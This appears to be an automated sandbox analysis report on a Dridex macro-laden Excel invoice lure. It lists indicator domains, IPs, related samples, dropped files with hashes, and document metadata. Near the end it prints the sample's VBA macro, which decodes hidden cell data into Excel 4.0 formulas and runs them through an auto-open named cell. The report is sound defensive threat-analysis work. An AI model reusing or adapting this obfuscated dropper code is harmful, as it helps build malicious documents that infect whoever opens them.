                                                                                                                                                            Fattura_25785.xlsmGet hashmaliciousBrowse
                                                                                                                                                              Fattura_20070.xlsmGet hashmaliciousBrowse
                                                                                                                                                                Fattura_20070.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  Fattura_26645.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    Fattura_26645.xlsmGet hashmaliciousBrowse

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      compagniamaestro.comn830467925857.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      n830467925857.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_25785.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_25785.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_20070.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_20070.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_26645.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      Fattura_26645.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36

                                                                                                                                                                      ASN

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      NAMECHEAP-NETUSDridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      • 199.192.21.36
                                                                                                                                                                      winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                      Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.116.236
                                                                                                                                                                      SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.187.31.7
                                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.187.31.7
                                                                                                                                                                      Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.116.236
                                                                                                                                                                      INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.117.244
                                                                                                                                                                      DSksIiT85D.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 199.188.200.97
                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.116.236
                                                                                                                                                                      Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                                                                                                                      • 104.219.248.112
                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.116.236
                                                                                                                                                                      RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.117.215
                                                                                                                                                                      74725794.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.122.60
                                                                                                                                                                      SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                      ACH Funds Transferred.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 199.188.200.124
                                                                                                                                                                      ACH Funds Transferred.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 199.188.200.124
                                                                                                                                                                      BENVAV31BU.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 63.250.38.8
                                                                                                                                                                      roK1cuvuLG.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 199.188.206.63
                                                                                                                                                                      DHL Details.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 198.54.126.165
                                                                                                                                                                      SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 199.188.200.97

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\AO965P\PN546Y\718.5
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):45017
                                                                                                                                                                      Entropy (8bit):5.1653486867978575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                                                                                                                                                                      MD5:4B04126D788D6958C2C62DCE6FE37988
                                                                                                                                                                      SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                                                                                                                                                                      SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                                                                                                                                                                      SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3BA17549-6936-488A-A3B4-7EF0154B3CE5
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):132942
                                                                                                                                                                      Entropy (8bit):5.372921135438226
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:McQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:CrQ9DQW+zBX8P
                                                                                                                                                                      MD5:241B9284D734E7EBE453893FA60A7083
                                                                                                                                                                      SHA1:19BCD1AAC07902831EC496F7C9B4386ECA312344
                                                                                                                                                                      SHA-256:778666D97FEBBB4C4548DE98474AD720978198296F457EE99512D0F3F76E57B1
                                                                                                                                                                      SHA-512:D375CA7A5B8898B8C4F18C0F16615CA1E55828C623974C37CC0937B4D924639BC6035E4CB3F5B7EBE5C9511EC60246A918E0BF5372AD137489C86425DB22FD95
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-26T15:22:58">.. Build: 16.0.13723.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9C55CF47.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 415 x 291, 8-bit colormap, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5305
                                                                                                                                                                      Entropy (8bit):7.83628317482236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ndsgj5y6EGgWKW/WkPsLhsKto+bDOukamzejtjcF+6QTzys5kcWCgupHLib:ndsgjI6RdKcXOn9b9vmUgs6QXys+NYW
                                                                                                                                                                      MD5:31F86AA3BD1ADA53D99B7BBEF6A1DEFC
                                                                                                                                                                      SHA1:148331C2D5EB437437D48ABE51866384D7154044
                                                                                                                                                                      SHA-256:E0EC55345EDC7EF4BBE4F20ABD6F8FE965475C632766FAE6CA1853674F2DC34C
                                                                                                                                                                      SHA-512:96D1DC354DCB3A262B997A98E83A0162F0F9E93050C7BC952B46FB886336C1C6370B3D5A9316039FD84211161F34BA3A866B8DFD385323551743674A24FF7B39
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.......#......4......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.....XXX................?p.....tRNS..........Y...#IDATx....:...bz.../..EE..(?3.(.".M.5....y!\....>...O,._...I.'..|~................k........o...b(.....AW..l...>...v.ClLq....8X.....4.._...w.n_;......E..X.X$...S..q.o.l.o...e..&>4.......n.c.t.p..H.._.....n..6..eG+...~..e...?.^......q....nz....9|....M.q..R..... `.|.M.5>e'.*.>..P...m.n[.?.o.....b...dk..v}s.......m>T..B..^?......0...........]...GX.>.....\-}X._.=.vE.l`e.V>...C..h.V>.K.-4....Oo...H..(.|qR.7nT.....-.$..L..z..St.|... P^...g#.y.......|N,..|N.(...y>f94{..w...?.C.\F[Z....z+.VY..F..l.1.L.O..[....)2.G.*...n........2.P..9..~..GZ.c>..!..E} ...'...\&q.p..9.e....."r..G...>.6W..H..#.fj.+S])...H..I.|$.....:....;....".q>.L..>.m4...^.c..?c.......MF$.M>...>d.F\l...u]6...P.....Xn$6.O.>O#.N.~..8.".4^6.3.....V.N`.p...QrP....+.........h.....U.rP....."...........B.sa..U..o*.....G.j.....Q..Q.KEj..&K..Cz..5l....q!.}..o...R
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9E8890DE.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 650 x 85, 8-bit colormap, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1005
                                                                                                                                                                      Entropy (8bit):7.551834228633037
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aB2uoC0w2bONUV99upE4ZXn8bf4F0T+xAlO6y:BuoBwawUV99/4ZXn8bT6AOf
                                                                                                                                                                      MD5:DA5C67B7042BB04E6BFB9F60D9470287
                                                                                                                                                                      SHA1:BFBDC4596111EF5D95183DB0526353CBCA84C43F
                                                                                                                                                                      SHA-256:0522D7C7600F1DD56346450DFE1466BA51CFEBCD095CD3154FB30DC563F96763
                                                                                                                                                                      SHA-512:D16BCF49A56F0FB926DB7C8DA413A976E1D0F53DA5EA73B729A5D11FFCF42FA149D17D3587A3DF56665C6CAAC44F903CA5D0278DCFDA8FE3C43318724C3507EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.......U......]5m....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........DCE.U`.......1a\...kIDATx....0.@C........E....4{...m5..#_..)%...p9:}...*.*."."."*.*.*..Y>.P.z.(..d4K...YE.G.9."."."*.`..V.e/.iAE....Q.7'..P......5.Tw58.".P...U...N}.V.QQQ#A..{..FT.a..E..Q..h.Z...>."*..Z1T..."...kT$A.H.'..G'.v..0DE.A.*.l*.>X....U...T..*...EE..y^..".N......V.5[l...:h.'P%.DE.-..M.....*B..Eh[.....E..#"...C..ZQ....K?...7t...b<o.{.*.HgNqC.Z1..u.g.-6T..m.W[.&..k........?.d..k..H..-.R+.P..w\..".C.-)e...#T.K..}...1.p..9.'Yj..."....?~.'`.I.+Z.KY."K........e..Q..*....%b.L.5.e9....}...q..pV..f..x...%..eU..]S...m...C...\..e.~T....z.....p......kT|.W..DE.HEoW...K.XBN.Q.4...%lEE.D..T...l.t..-...[/]m.......]..V+>_.~?....]..AE.FFY....9/*.....:r<,.v3.xzd....a.."..p.Cg........._V... M.......P.P......P.P......(..6..*.x.Q.N.>.\.^...N>.`7...Z....&..(!u.}hA....L\.NQ.......&...U.;.".>.Ub....2..=KkU.?"*B.........O1.u......&B........P.P....P........Zd.)e.t....IEN
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F8437211.emf
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1976
                                                                                                                                                                      Entropy (8bit):1.9759705070369498
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Yn9e/kaHslqLYp0FIQ4+P/k1EijBdShS8u1NnNlou1NRztDAcqdckgDWojkMXNVf:YniVH9a0x4I8BAKNHoKNfDn9tUs0zCp
                                                                                                                                                                      MD5:1C7221B8A7104792FDEEA41E5D7BA0D0
                                                                                                                                                                      SHA1:D49122E2BF94D92ED067570D638B672855C05893
                                                                                                                                                                      SHA-256:76F287B1E3251B7E0E5BA27BFB05B35831150CC665DE00F9FD2D807E2D2A028D
                                                                                                                                                                      SHA-512:928EF6FCCDB96A4AADD35D36171F3D09DE5605A70FE505862A294F089FEF53E697426017D3973B9BCAFF8D579A8A85C38943DCF47C5C5DD1187AB1A20D50E473
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: ....l................................... EMF........$.......................`...1........................|..F...........GDIC........dDv...............................................................................-.........!.................!.............................-.........!.................!.................!.................!...............-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d...................................!..............?
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NR7DA722.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):45017
                                                                                                                                                                      Entropy (8bit):5.1653486867978575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                                                                                                                                                                      MD5:4B04126D788D6958C2C62DCE6FE37988
                                                                                                                                                                      SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                                                                                                                                                                      SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                                                                                                                                                                      SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      IE Cache URL:https://compagniamaestro.com/
                                                                                                                                                                      Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):248808
                                                                                                                                                                      Entropy (8bit):4.297118070299315
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:XIR38WZFVKKHSRDqBcA+FLM0Ar6t3s6bh:XqsMFVTHSIcA+FLM0Awjbh
                                                                                                                                                                      MD5:03ACE6159C87E01B6E3ACE05D8AA30B8
                                                                                                                                                                      SHA1:9F4BAA9446371B0DB5184C602A4E6AB8EEE4E4CC
                                                                                                                                                                      SHA-256:AAEECB42BC011B6E0936BEC7F899452CA87B36B4847DDF25C0A3624E57F0B559
                                                                                                                                                                      SHA-512:504645105818DC7BC44ABC4DB55CA0390B49F76846E4F2113FE27C0E667E1259A37049DF01ACFD9238130A2E09BF2B445B966B580B78777CF53DC37A43B1A114
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MSFT................Q................................%......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................H...4............................................ ...............................x..lL..............T............ ..P........................... ...................................................
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                      C:\Users\user\Desktop\~$Dridex-06-bc1b.xlsm
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):165
                                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                                      Entropy (8bit):7.6136938439046835
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                                      File name:Dridex-06-bc1b.xlsm
                                                                                                                                                                      File size:29655
                                                                                                                                                                      MD5:f72f88ebdf048fdfedf0aa3e298d9e71
                                                                                                                                                                      SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
                                                                                                                                                                      SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b
                                                                                                                                                                      SHA512:0c6d96fcda11df417cfd48d51753d5a6334d80df04b3709ccbfc8a2d5d073822ad606da49e99c724a9d5bd16a98a623f2f9f3a2cbfe2b01bc668f44991db2903
                                                                                                                                                                      SSDEEP:384:flRwzF2FBLDDBf2kbi+lj4YhX8rRI6vXO9BvGiSmDU+P4QRdUgE5cF9Y3XF:fDAFqP1u6NsrRzXO+iSkU+waSxcF9YnF
                                                                                                                                                                      File Content Preview:PK..........!.c...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                                      Static OLE Info

                                                                                                                                                                      General

                                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                                      Number of OLE Files:2

                                                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                                                                                                                                                                      Indicators

                                                                                                                                                                      Has Summary Info:False
                                                                                                                                                                      Application Name:unknown
                                                                                                                                                                      Encrypted Document:False
                                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                                      Summary

                                                                                                                                                                      Author:brt
                                                                                                                                                                      Last Saved By:
                                                                                                                                                                      Create Time:2020-11-24T09:53:01Z
                                                                                                                                                                      Last Saved Time:2020-11-24T11:16:24Z
                                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                                      Security:0

                                                                                                                                                                      Document Summary

                                                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                                                      Company:
                                                                                                                                                                      Contains Dirty Links:false
                                                                                                                                                                      Shared Document:false
                                                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                                                      Application Version:16.0300

                                                                                                                                                                      Streams with VBA

                                                                                                                                                                      VBA File Name: Foglio1.cls, Stream Size: 2640
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:VBA/Foglio1
                                                                                                                                                                      VBA File Name:Foglio1.cls
                                                                                                                                                                      Stream Size:2640
                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . p . . N . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . p a g o U n o , 1 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . .
                                                                                                                                                                      Data Raw:01 16 03 00 00 12 01 00 00 fc 03 00 00 f6 00 00 00 22 02 00 00 ff ff ff ff 03 04 00 00 a7 07 00 00 00 00 00 00 01 00 00 00 70 fe ed 4e 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                      VBA Code Keywords

                                                                                                                                                                      Keyword
                                                                                                                                                                      PagamentoDocumento
                                                                                                                                                                      VB_Name
                                                                                                                                                                      VB_Creatable
                                                                                                                                                                      Application.OnTime
                                                                                                                                                                      VB_Exposed
                                                                                                                                                                      Frame"
                                                                                                                                                                      Len(n)
                                                                                                                                                                      VB_Control
                                                                                                                                                                      "TURN()":
                                                                                                                                                                      VB_Customizable
                                                                                                                                                                      "Aut"
                                                                                                                                                                      ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants):
                                                                                                                                                                      "=RE"
                                                                                                                                                                      Replace(E,
                                                                                                                                                                      "pagoUno,
                                                                                                                                                                      "BarUno"
                                                                                                                                                                      Chr(Asc(Mid(n,
                                                                                                                                                                      Split(u,
                                                                                                                                                                      PagamentoDocumento()
                                                                                                                                                                      VB_TemplateDerived
                                                                                                                                                                      MSForms,
                                                                                                                                                                      False
                                                                                                                                                                      excell()
                                                                                                                                                                      excell
                                                                                                                                                                      Attribute
                                                                                                                                                                      Private
                                                                                                                                                                      VB_PredeclaredId
                                                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                                                      pagoUno_Layout()
                                                                                                                                                                      VB_Base
                                                                                                                                                                      VBA Code
                                                                                                                                                                      Attribute VB_Name = "Foglio1"
                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                                      Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"
                                                                                                                                                                      Sub PagamentoDocumento()
                                                                                                                                                                      j = "=RE"
                                                                                                                                                                      m = "TURN()":
                                                                                                                                                                      Sheets(1).Cells(6, 1).value = j & m: mg = "Aut"
                                                                                                                                                                      Sheets(1).Cells(1, 1).Name = mg & "o_io22"
                                                                                                                                                                      c = 3:
                                                                                                                                                                      For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): n = n & p: Next
                                                                                                                                                                      For X = c To Len(n) Step c
                                                                                                                                                                      If (X Mod 2) Then k = -1 Else k = 1
                                                                                                                                                                      u = u & Chr(Asc(Mid(n, X, 1)) + k): Next
                                                                                                                                                                      IR = Split(u, "{")
                                                                                                                                                                      For Each E In IR
                                                                                                                                                                      Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")
                                                                                                                                                                      Run (mg & "o_io22")
                                                                                                                                                                      Next
                                                                                                                                                                      excell
                                                                                                                                                                      End Sub
                                                                                                                                                                      Private Sub excell()
                                                                                                                                                                      Application.OnTime Now, "BarUno"
                                                                                                                                                                      End Sub
                                                                                                                                                                      
                                                                                                                                                                      Private Sub pagoUno_Layout()
                                                                                                                                                                      PagamentoDocumento
                                                                                                                                                                      End Sub
                                                                                                                                                                      VBA File Name: Modulo1.bas, Stream Size: 889
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:VBA/Modulo1
                                                                                                                                                                      VBA File Name:Modulo1.bas
                                                                                                                                                                      Stream Size:889
                                                                                                                                                                      Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
